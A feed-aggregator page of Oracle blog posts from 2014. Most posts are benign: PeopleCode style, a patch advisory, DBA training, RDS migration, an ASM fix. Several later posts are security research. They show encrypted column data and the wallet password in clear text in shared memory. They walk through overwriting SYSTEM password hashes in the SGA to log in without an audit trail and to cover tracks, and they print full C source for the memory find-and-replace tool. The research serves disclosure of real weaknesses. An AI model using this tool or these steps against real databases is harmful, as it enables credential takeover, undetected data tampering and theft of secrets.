Feed aggregator

PeopleCode Coding Discipline

Jim Marion - Wed, 2014-07-16 12:23

Java, JavaScript, C++, C#, Objective-C, Groovy... what do these languages have in common? Yes, curly braces, but besides that... actually, there are a lot of similarities between these languages. Throw Visual Basic, Perl, Python, or any other well-known language into the mix and the number of similarities drops significantly. Setting semantics and syntax aside, a common attribute of all well-known languages is a body of standards and best practices. Some of those best practices (such as coding style) differ by language. For example, bash scripts can either look like, uh... bash scripts or they can look like C-style logic statements. Obviously, bash best practices prefer that you make bash code look like bash code. Other standards are personal: do you prefer real tabs or spaces? How many spaces does your tab consume? Do you put curly braces on a new line?

How does all of this fit into PeopleCode? Forget about code formatting preferences. Application Designer has its own code formatting ideas. But there are other best practices that can help you write better code with fewer defects (fewer defects = better code). By following best practices your code will be easier to read, you will be more productive, and your users will be happier because you deliver better solutions faster.

Even though best practices usually result in code that is more efficient to process, that isn't really the point. Computers can interpret just about anything. Compilers and interpreters are really good at eliminating useless words and resolving seemingly incomprehensible logic. I love Martin Fowler's quote, "Any fool can write code that a computer can understand. Good programmers write code that humans can understand." Best practices are really about writing code that humans can easily comprehend. For example, avoid complex logic (including double negatives, or any negative logic, for that matter), keep your method and function code short, etc. If you write some code, leave it for a night, and then come back the next day and either need to read lots of comments to figure it out or spend a few minutes "remembering" what that code does, then the code is probably too complex. The problem with complex code is that it is easily misinterpreted by humans. Another problem with complex code is we actually ignore it when trying to resolve problems. We know it takes time to digest complex code, so we avoid it, preferring to test simple code first. Why waste time trying to understand complex code if it might be functioning properly?

Today's Quest Newsletter contained a link to 10 Bad Coding Practices That Wreck Software Development Projects. These are language agnostic practices that we can easily apply to PeopleSoft development.

If I were to summarize coding best practices, I think I would do it like this: two.sentenc.es. Now, arguably, short does not equal comprehensible. There are programmers who err on the terse side because it is clever. True, short code is often clever; it is also often hard to read. Most of us, however, err the other way. E. F. Schumacher said, "Any fool can make things bigger, more complex, and more violent. It takes a touch of genius — and a lot of courage — to move in the opposite direction." Schumacher died in 1977, so this problem is not new.

Computer programming is about communication. As programmers we have two audiences:

  • Computers (which can interpret anything -- even complex stuff)
  • Humans (who have a limited attention span, distractions, and a preference for simplicity)

Here is why I think discipline and best practices are critical for good PeopleCode:

We use PeopleCode to create business rules, but PeopleCode is NOT a business rules language. PeopleCode is a Metadata manipulation language. (Note: this is purely my opinion)

Here is why I believe PeopleCode is for metadata, not business rules: PeopleCode only has metadata objects: records, fields, SQL, components, menus, etc. These are all metadata. These are the low-level APIs we use to write business logic. Consider the following PeopleCode:

Local Record &rec = CreateRecord(Record.PSOPRDEFN);
Local Field &descr;

/* Set the key value, then fetch the row by key */
&rec.OPRID.Value = "jimsoprid";
&rec.SelectByKey();
&descr = &rec.GetField(Field.OPRDEFNDESC);

&descr.Value = "Jim Marion";

&rec.Update();

This code implements business logic, but does so by manipulating metadata objects. PeopleCode metadata objects are building blocks for business logic. If we were to rewrite this using a business logic language, it would probably look something like this:

Local User &u = GetUser("jimsoprid");

&u.descr = "Jim Marion";
&u.Update();

And this is why discipline and best practices are SO important for PeopleCode developers: We are trying to speak business logic with a metadata vocabulary. We start with a communication deficit. It is like trying to teach advanced weaving using an automobile mechanics vocabulary. The two subjects have different vocabularies. But if you combine the words correctly, you can communicate the same meaning.

Oracle Critical Patch Update Advisory – July 2014

VitalSoftTech - Tue, 2014-07-15 20:45
The July Oracle Critical Patch Update has been released. This includes Critical Patch Updates and Patch Set Updates for the Database Product Suite, Fusion Middleware Product Suite, Exalogic, and Enterprise Manager Suite. It includes 113 new security fixes, 5 of them for the Oracle Database, and a host of other bug fixes. More about the July 2014 Critical Patch Update […]
Categories: DBA Blogs

July 2014 Critical Patch Update Released

Oracle Security Team - Tue, 2014-07-15 14:41

Hello, this is Eric Maurice.

Oracle today released the July 2014 Critical Patch Update. This Critical Patch Update provides 113 new security fixes across a wide range of product families including: Oracle Database, Oracle Fusion Middleware, Oracle Hyperion, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite, Oracle PeopleSoft Enterprise, Oracle Siebel CRM, Oracle Industry Applications, Oracle Java SE, Oracle Linux and Virtualization, Oracle MySQL, and Oracle and Sun Systems Products Suite.

This Critical Patch Update provides 20 additional security fixes for Java SE. The highest CVSS Base Score for the Java vulnerabilities fixed in this Critical Patch Update is 10.0. This score affects a single Java SE client vulnerability (CVE-2014-4227). 7 other Java SE client vulnerabilities receive a CVSS Base Score of 9.3 (denoting that a complete compromise of the targeted client is possible, but that the access complexity to exploit these vulnerabilities is “medium”). All in all, this Critical Patch Update provides fixes for 17 Java SE client vulnerabilities, 1 fix for a JSSE vulnerability affecting client and server, and 2 fixes for vulnerabilities affecting Java client and server. Oracle recommends that home users visit http://java.com/en/download/installed.jsp to ensure that they run the most recent version of Java. Oracle also recommends that Windows XP users upgrade to a currently supported operating system. Running an unsupported operating system, particularly one as prevalent as Windows XP, creates a very significant risk to users of these systems: vulnerabilities are widely known, exploit kits are routinely available, and security patches are no longer provided by the OS vendor.

This Critical Patch Update also includes 5 fixes for the Oracle Database. The highest CVSS Base Score for these database vulnerabilities is 9.0 (this score affects vulnerability CVE-2013-3751).

Oracle Fusion Middleware receives 29 new security fixes with this Critical Patch Update. The most severe CVSS Base Score for these vulnerabilities is 7.5.

Oracle E-Business Suite receives 5 new security fixes with this Critical Patch Update. The most severe CVSS Base Score reported for these vulnerabilities is 6.8.

Oracle Sun Systems Products Suite receives 3 new security fixes with this Critical Patch Update, and one additional Oracle Enterprise Manager Grid Control fix is applicable to these deployments. Fixes that exist because of the dependency between individual Oracle product components are listed in italics in the Critical Patch Update Advisory. These bugs are listed in the risk matrices of the products they initially exist in, as well as in the risk matrices of the products they are used with. The most severe CVSS Base Score for these Oracle Sun Systems Products Suite vulnerabilities is 6.9.

As a reminder, Critical Patch Update fixes are intended to address significant security vulnerabilities in Oracle products and also include code fixes that are prerequisites for the security fixes. As a result, Oracle recommends that this Critical Patch Update be applied as soon as possible by customers using the affected products.

For More Information:

The July 2014 Critical Patch Update Advisory is located at http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

The Oracle Software Security Assurance web site is located at http://www.oracle.com/us/support/assurance.

Java home users can detect if they are running obsolete versions of Java SE and install the most recent version of Java by visiting http://java.com/en/download/installed.jsp


Oracle DBA Training Options Are Changing

Training options for Oracle Database DBAs are changing. Generally, I don't think they are changing for the better. Companies don't value Oracle Database Administrators like they used to, and it shows in their lack of investment in professional development.

When I travel a long way from home, I tend to get very reflective about life, death and beyond. On my way home from teaching an onsite two-day Oracle performance tuning seminar coupled with a one-day predictive analysis (forecasting) class in Ghana (yes, Ghana as in AFRICA) I started thinking about how fortunate the Ghana DBAs I taught are. Clearly their management is willing to invest in their DBAs' future. This is very, very rare.

Today most Oracle DBAs receive what I call, "Training By Google." You know, blog posts, YouTube videos and various syntax websites. While these are all valuable (I am a content creator myself with my blog posts and videos), they are no substitute for instructor led training. Not even close! So what is happening that is forcing Oracle DBAs to change their training habits?

So Why The Change? Three Reasons
1. Training Budget. Over the past five years I have been disappointed (more like disturbed) that most companies do not provide the training DBAs need. They just won't do it. IT managers (not typically DBA managers) believe their staff can get by with "Training By Google." It's stupid and foolish. It tells DBAs they are worthless and leaves them unprepared to perform at their best. And, of course, that ends up hurting the company they work for. Stupid and foolish.

Are we then surprised with the results from poor performing systems, down production systems, massive security breaches, and DBAs hopping from one company to another?

2. Travel Budget. A nasty tactic many companies use is to provide a minimal training budget but without a travel budget. If you want specialized and advanced training, you'll probably have to travel to get to it. Maybe not hundreds or thousands of miles, but probably more than you want to commute each day.

Essentially the company is splitting the training cost with the DBA and ensuring the DBA really, really wants the training. OK, I can respect that. But, I think a company that does not truly provide training for its employees (human beings that spend a significant portion of their lives doing whatever it takes to get the job done) is cruel and frankly immoral.

3. More Training Options. The good news for Oracle DBAs is that there are more information sources and training options available today than ever before. When the orapub.com website began in 1995, doing a "tail -f" on the web log was a lesson in world geography. It was amazing watching line after line stream by as DBAs from all over the world looked for Oracle performance materials on the web. Now there is much more available. Training options for Oracle DBAs now include traditional instructor-led training (ILT), web sites from content aggregators (people who pull together content for us), content creators (like myself), and online training. I'm very excited about online training and have made a significant investment in OraPub's Online Institute.

Summary
So there you have it. Because of economics, the devaluation of DBAs as human beings and the increase in training options, the Oracle DBA training landscape is changing. If you believe this, the next question is, "What is good content?" That will be the subject of my next posting!

Enjoy your work and thanks for reading!

Craig.
Categories: DBA Blogs

MySQL on-premise to Amazon RDS migration tips

Kubilay Çilkara - Mon, 2014-07-14 14:27
Things to watch and do when migrating MySQL databases from ‘on-premise’ to Amazon AWS RDS


  • Not all database versions can be migrated to RDS, especially if you want a zero-downtime migration. Make sure you know which versions are possible; at this writing Amazon has announced that it will support any version of MySQL 5.1 and above.
  • In a zero-downtime migration to Amazon RDS you work with mysqldump or mydumper to import the baseline data, and then you use MySQL replication and the binary log position to apply the additional records created during the import (the delta). That is, it is possible to create a MySQL slave in the Amazon AWS cloud!
  • So when you have confirmed that your on-premise MySQL is compatible, you can use mysqldump with the --master-data parameter to export your data, including the binlog position coordinates at the time of the export. If your database is big, you can use mydumper to do this with parallel streams. You will use the coordinates and MySQL replication to catch up with the on-premise master database when creating the MySQL slave in RDS (see the sketch after this list).
  • Use different database parameter groups for different databases.
  • As you load the RDS database using myloader or mysql, the operation might take a long time depending on the size of your database. If this is the case, disable backups (it stops logging) and try using one of the better-spec RDS instance classes with provisioned IOPS for the duration of the operation. You can always downsize the RDS instance after you have completed the initial load.
  • After you have completed the initial load, use Multi-AZ, which is a synchronous standby (in Oracle parlance), and schedule the backups immediately, before you open your applications to the database, as the initial backup requires a reboot.
  • Beware that there is no SSH access to RDS, which means you have no access to the file system.
  • Get the DB security groups right and make sure your applications can access the RDS instances.
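
As an illustration of the catch-up step, here is a minimal sketch of the replication commands run against the RDS instance. It assumes the RDS replication stored procedures mysql.rds_set_external_master and mysql.rds_start_replication are available in your RDS MySQL version; the host, user, password, and binlog coordinates are placeholders you would take from your own environment and from the CHANGE MASTER line written by mysqldump --master-data.

-- Point the RDS instance at the on-premise master (all values below are placeholders).
CALL mysql.rds_set_external_master(
  'onprem-master.example.com',  -- on-premise master host
  3306,                         -- port
  'repl_user',                  -- replication user created on the master
  'repl_password',              -- that user's password
  'mysql-bin.000042',           -- binlog file captured by mysqldump --master-data
  120,                          -- binlog position captured at export time
  0);                           -- 0 = no SSL

-- Start applying the delta that accumulated during the initial load.
CALL mysql.rds_start_replication;

-- Monitor until Seconds_Behind_Master reaches zero, then cut applications over.
SHOW SLAVE STATUS;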
Categories: DBA Blogs

Take a Walk

Scott Spendolini - Mon, 2014-07-14 11:24
Steven Feuerstein (https://twitter.com/stevefeuerstein) just tweeted this:

Improve your programming with a daily regimen of situps (or anything you can do to strengthen abs), walks in the woods, and lots of water.
— Steven Feuerstein (@stevefeuerstein) July 14, 2014 Which in turn, inspired me to quickly write this post.

The combination of being in IT and working from home leads to lots of hours logged in some sort of chair, whether it's in my home office, at a customer site or a coffee shop.  You don't need to be a doctor to realize that this is not particularly healthy behavior.

So for the past few months, I've incorporated something new into my daily routine: taking a walk.  It doesn't sound like much, and quite honestly, it really isn't.  But, I wish that I had started this years ago, because the benefits of it are huge.

First of all, it's nice to get outside during the day, especially when it's actually nice out.  Nothing can quite compare to it, no matter how many pixels they squeeze into a tablet.  Sometimes I just walk at a leisurely pace, other times I run.  I'm not training for any specific race, nor do I feel compelled to share my statistics over social media.  I just do what I want when I can.

Second of all, it gives me some time to listen to a podcast or music, or to just think.  I've really grown to like the podcasts that the folks at TWiT (http://www.twit.tv) produce, with This Week in Tech being one of my favorites.  Listening to something that interests you makes the time go by so much quicker that you may even be tempted to extend your distance to accommodate the extra content.

In fact, listening to them really puts me in a creative and inspired mood, which helps explain the third benefit: background processing.  I don't know much about neuroscience, but I do know a little bit how my brain works.  If I'm struggling with a difficult problem, I've learned over time that the best thing that I can do is to literally walk away from it.  Going on a walk or run or even a drive allows my brain to "background process" that problem while I focus on other things.  The "A-Ha!" moment that I have is my brain's way of alerting me once the problem has been solved.   Corny, I know, but that's how it works for me.

And lastly - and probably most importantly - I've been able to drop a few pounds because of my walks (combined with better eating habits).  I do use RunKeeper to log my walks and track my weight, because numbers simply don't lie.  It also serves as a source of inspiration if I can beat a personal record or cross a weight milestone.

Big Data doom mongers need to look outside of the marketing department

Steve Jones - Mon, 2014-07-14 10:10
In every change there are hype machines that overplay and sages who call doom.  Into the Big Data arena steps David Searls to proclaim, in an article over at ZDNet, that Big Data is a myth and simply hype which is set to burst. But big data, he said, is nothing more than the myth that collecting vast amounts of data can help companies know customers better than those customers even know
Categories: Fusion Middleware

Next ORCLAPEX NOVA Meetup: July 17th

Scott Spendolini - Mon, 2014-07-14 07:37
The next Meetup for the ORCLAPEX NOVA Meetup Group will be this Thursday, July 17th at 7:00PM at Oracle Reston.  (Details: http://www.meetup.com/orclapex-NOVA/events/192592582/)

We're going to try the "Open Mic" format that has been wildly successful at KScope for the past few years.  The rules are quite simple: anyone can demonstrate their APEX-based solution for up to 10 minutes.  No need to reserve a spot or spend too much time planning.  And as always, no slides will be permitted - strictly demo.

Anyone and everyone is welcome to present - even if you have never presented before.  We're a welcoming group, so please don't be shy or feel intimidated!  I've actually seen quite an amazing selection of APEX-based solutions at prior open mic nights from people who have never presented before, so I encourage everyone to give it a try.

While there is WiFi available at Oracle, it's always best to have a local copy of your demonstration, just in case you can't connect or the network is having issues.

See you Thursday night!

Oracle encrypted table data found unencrypted in SGA

ContractOracle - Sun, 2014-07-13 22:29
When data needs to be kept private, or companies are worried about data leakage, then they often choose to store that data in encrypted columns in the table using Oracle Transparent Data Encryption. 

I wanted to see if that data was stored in the SGA in an unencrypted format.  I ran the following test from sqlplus.

CDB$ROOT@ORCL> create table credit_card_number(card_number char(16) encrypt);

Table created.

CDB$ROOT@ORCL> insert into credit_card_number values ('4321432143214321');

1 row created.

CDB$ROOT@ORCL> update credit_card_number set card_number = '5432543254325432' where card_number = '4321432143214321';

1 row updated.

CDB$ROOT@ORCL> VARIABLE cardnumber char(16);
CDB$ROOT@ORCL> EXEC :cardnumber := '6543654365436543';

PL/SQL procedure successfully completed.

CDB$ROOT@ORCL> update credit_card_number set card_number = :cardnumber where card_number = '5432543254325432';

1 row updated.

CDB$ROOT@ORCL> commit;

Now we search SGA for the data that should be encrypted to keep it private.  


[oracle@localhost shared_memory]$ ./sga_search 4321432143214321
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 459100
4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 3244704
4321432143214321
/dev/shm/ora_orcl_38895617_29 found string at 2529984
4321432143214321
[oracle@localhost shared_memory]$ ./sga_search 5432543254325432
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 459061
5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 4106466
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2075064
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2528552
5432543254325432
/dev/shm/ora_orcl_38895617_28 found string at 1549533
5432543254325432
[oracle@localhost shared_memory]$ ./sga_search 6543654365436543
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 6543654365436543
/dev/shm/ora_orcl_38895617_29 found string at 3801400
6543654365436543

The output shows that all 3 of the card_number values used in the demonstration can be found in SGA, sometimes in multiple locations.  Flushing the buffer cache did not clear the data from SGA, but flushing the shared pool did.  Further analysis is needed to pinpoint exactly where in the shared pool the unencrypted data is being stored, and whether it is in SQL statements, SQL variables, or interim values kept by the encryption process.  Further testing is also needed to see if it is possible to avoid potential data leakage by using bind variables or wrapping the SQL in PL/SQL (see the sketch below).  In the meantime ... be aware that data you believe to be encrypted may actually be stored in memory in clear text, visible to anyone with privileges to connect to the SGA.
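
For anyone who wants to run that follow-up test, here is a minimal sketch of the PL/SQL-wrapped variant. The table comes from the demonstration above, the new card number is an arbitrary placeholder, and whether this actually keeps the value out of the shared pool is exactly the open question.

DECLARE
   l_card   VARCHAR2(16) := '7654765476547654';  -- placeholder test value
BEGIN
   -- The new value only ever appears as a PL/SQL variable (a bind at the SQL layer),
   -- never as a literal inside the SQL text.
   UPDATE credit_card_number
      SET card_number = l_card
    WHERE card_number = '6543654365436543';
   COMMIT;
END;
/
-- Then re-run sga_search for 7654765476547654 to see whether it still shows up.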

Oracle TDE FAQ  :- http://www.oracle.com/technetwork/database/security/tde-faq-093689.html
States that "With TDE column encryption, encrypted data remains encrypted inside the SGA, but with TDE tablespace encryption, data is already decrypted in the SGA, which provides 100% transparency."
Categories: DBA Blogs

Oracle encryption wallet password found in SGA

ContractOracle - Sun, 2014-07-13 21:51
If companies are worried about data privacy or leakage, they are often advised to encrypt sensitive data inside Oracle databases to stop DBAs from accessing it, and to implement "separation of duties" so that only the application or data owner has the encryption keys or wallet password.  One method to encrypt data is to use Oracle Transparent Data Encryption, which stores keys in the Oracle wallet protected by a wallet password.  Best practice dictates using a very long wallet password to avoid rainbow-table and brute-force attacks, and keeping the key and password secret.

I wrote a simple program to search for data in Oracle shared memory segments, and it was able to find the Oracle wallet password, which means anyone who can connect to the shared memory can get the wallet password and access the encrypted data.  The following demonstrates this :-

First open and close the wallet using the password :-


CDB$ROOT@ORCL> alter system set encryption wallet open identified by "verylongverysecretwalletpassword1";

System altered.

CDB$ROOT@ORCL> alter system set wallet close identified by "verylongverysecretwalletpassword1";

System altered.


Now search for the wallet password in SGA :-

oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1

The search found the password in SGA, so it should be possible to analyse the memory structure that currently stores the known password, and create another program to directly extract passwords on unknown systems.  It may also be possible to find the password by selecting from v$ or x$ tables.  I have not done that analysis, so I don't know how difficult it would be, but if the password is stored, it will be possible to extract it.  Even if it is mixed up with a lot of other SQL text and variables, it would be very simple to just try opening the wallet using every string stored in SGA.

The password is still in SGA after flushing the buffer cache.

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1


After flushing the shared pool the password is no longer available.  

CDB$ROOT@ORCL> alter system flush shared_pool;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
[oracle@localhost shared_memory]$ 

As this password really should be secret, Oracle should not store it.   More research is needed to confirm whether the password can be hidden by using bind variables, obfuscation, or wrapping it in PL/SQL (see the sketch below).
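
As a starting point for that research, here is a minimal sketch of the PL/SQL-wrapped variant one might test. The password is the same demonstration string used above, and note that because ALTER SYSTEM does not accept bind variables the password still ends up inside a SQL string; whether that string is any harder to find in SGA is part of what the test would need to examine.

DECLARE
   l_pwd   VARCHAR2(128) := 'verylongverysecretwalletpassword1';  -- would come from a secure source in a real test
BEGIN
   -- ALTER SYSTEM cannot use binds, so the password is concatenated into the statement text.
   EXECUTE IMMEDIATE 'alter system set encryption wallet open identified by "' || l_pwd || '"';
END;
/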
Categories: DBA Blogs

ASM Startup Fails With ORA-04031 After Adding CPUs

Don Seiler - Sun, 2014-07-13 15:11
A few weeks ago we upgraded one of our production servers, adding another CPU tray. This brought the number of CPU cores from 80 to 160, and took us from 2TB of RAM to 4TB (just in time for Oracle to announce the in-memory database in 12.1.0.2!).

However, when I went to start things up, ASM wouldn't start, giving me these errors:

ORA-04031: unable to allocate 32 bytes of shared memory ("shared pool","unknown object","KKSSP^550","kglseshtSegs")
ORA-04031: unable to allocate 392 bytes of shared memory ("shared pool","unknown object","sga heap(1,1)","kdlwss")

ORA-04031: unable to allocate 560 bytes of shared memory ("shared pool","unknown object","sga heap(1,1)","KKSSP")
RBAL (ospid: 59427): terminating the instance due to error 4031




A quick search of MOS turned up this gem:

Unable To Start ASM (ORA-00838 ORA-04031) On 11.2.0.3/11.2.0.4 If OS CPUs # > 64. (Doc ID 1416083.1), with this cause:
In 11.2.0.3/11.2.0.4, the "PROCESSES" parameter will be default to "available CPU cores * 80 + 40" (in the ASM spfile). As the default value for "MEMORY_TARGET" is based on "PROCESSES", it can be insufficient if there is a large number of CPU cores or large number of diskgroups which could cause issues (i.e. Grid Infrastructure stack fails to stop with ORA-04031 etc) per Bug:13605735 & Bug:12885278, it is recommended to increase the value of MEMORY_MAX_TARGET & MEMORY_TARGET before upgrading/installing to 11.2.0.3/11.2.0.4 (does not apply to 10g ASM).
We followed the workaround of increasing the ASM memory_target (and memory_max_target) to 4GB (from 500MB) and things started up just fine.
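
For reference, here is a minimal sketch of what that workaround looks like on the ASM instance, assuming the instance is running from an spfile and you are connected as SYSASM; the 4G value mirrors what we used and should be adjusted to your environment.

-- Raise the memory targets in the ASM spfile.
ALTER SYSTEM SET memory_max_target = 4G SCOPE = SPFILE SID = '*';
ALTER SYSTEM SET memory_target = 4G SCOPE = SPFILE SID = '*';
-- Restart ASM (and therefore the Grid Infrastructure stack) for the new values to take effect.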

We've since increased the memory in ASM even more and have seen even better performance, but I haven't taken the time yet to precisely understand where that improvement is coming from. I'll be sure to write another post to detail that.

For now we're definitely enjoying the bigger shared pool and buffer caches in 11.2, and we're excited to dig into the in-memory options in the upcoming 12.1.0.2.
Categories: DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 18:12
The dates, and the speakers, for the Latin America Tour have been announced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 04:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from the datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, that the database did not crash or detect the data change, and that it allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record and no evidence in the datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back out the changes made to SGA, restoring the original hash values, to cover up completely.

Sample output from the first SGA update command above follows :-

[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_75 replace string at 994020
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_37 replace string at 450614
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_35 replace string at 695886
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
Error: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 03:49
Following is a proof-of-concept program to change data in Oracle shared memory mapped to /dev/shm.
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.  I have tested it on Linux against Oracle 12c databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (sample program here).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>     /* O_RDWR */
#include <sys/stat.h>  /* fstat, struct stat */
#include <sys/file.h>
#include <sys/mman.h>

replace_sga(char search_string[],char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        for (i = 0; i < fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        close(fd);
      }
    }
  }
  closedir(d);
}

